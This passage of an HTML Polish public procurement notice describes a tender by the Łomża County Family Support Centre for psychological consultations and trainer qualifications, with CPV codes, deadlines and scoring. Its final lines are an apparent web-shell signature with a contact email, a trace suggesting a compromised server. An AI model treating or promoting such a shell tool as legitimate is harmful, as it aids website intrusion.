W uwagi na fakt, iż Zamawiający przewiduje przeprowadzenie kilku szkoleń grupowych dla uczestników projektu z zakresu umiejętności miękkich niezbędnych do poruszania się na rynku pracy, wymaga się, aby osobay przewidziane do realizacji zamówienia posiadała obok wymaganego wykształcenia i 5-letniego doświadczenia zawodowego w pracy z klientami pomocy społecznej również potwierdzenie kwalifikacji zawodowych w obrębie zawodu wykładowca na kursach (trener)..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 79.61.10.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie - 50</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Indywidualne  oraz grupowe konsultacje z psychologiem lub psychoterapeutą.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest przeprowadzenie 130 godzin konsultacji psychologicznych (1 godzina=60 minut): w tym 90 godzin konsultacji dla uczestników projektu Razem ku samodzielności - Integracja społeczna i zawodowa osób zagrożonych wykluczeniem społecznym i 40 godzin konsultacji dla osób zgłaszających się do Punktu Doradczo-Konsultacyjnego działającego w ramach ww projektu.

Miejscem wykonywania usługi będzie siedziba Powiatowego Centrum Pomocy Rodzinie w Łomży. Zamawiający użycza bezpłatnie miejsce wykonania usługi.
Daty i godziny zajęć będzie ustalać Zamawiający, zgodnie z zapotrzebowaniem zgłaszanym przez klientów. Porady dla osób korzystających z porad w ramach Punktu będą udzielane w dni powszednie od poniedziałku do piątku w  godzinach od 8.00  do 17.00. W związku z faktem, iż osoby korzystające z poradnictwa zgłaszają się do nas nieregularnie, Zamawiający będzie na bieżąco ustalać wraz z Wykonawcą  terminy dyżurów ( wymaga się aby Wykonawca dysponował przynajmniej 3 godzinami w tygodniu). 
Natomiast w ramach godzin przewidzianych dla beneficjentów wymaga się, aby specjalista obok prowadzenia spotkań indywidualnych i psychoterapii rodzinnej uczestniczył również w spotkaniach Grupy Wsparcia dla opiekunów dzieci niepełnosprawnych: tj. około 3 spotkań stacjonarnych (odbywają się popołudniami w dni powszednie w siedzibie Zamawiającego) oraz w jednym spotkaniu wyjazdowym weekendowym.   Zakres i tematyka doradztwa związana będzie z indywidualnymi potrzebami klientów; Doradztwo powinno zmierzać do zdiagnozowania potrzeb społeczno zawodowych uczestnika konsultacji, poradnictwo świadczone na rzecz osób i rodzin mających trudności lub wykazujących potrzebę wsparcia w rozwiązywaniu problemów życiowych, w tym problemów interpersonalnych, wychowawczych,  psychospołecznych, problemów  dot. przemocy w rodzinie, czy opieki nad osobą niepełnosprawną..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 85.12.12.70-6.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 07.12.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 50</li>
<li>2. Doświadczenie - 50</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com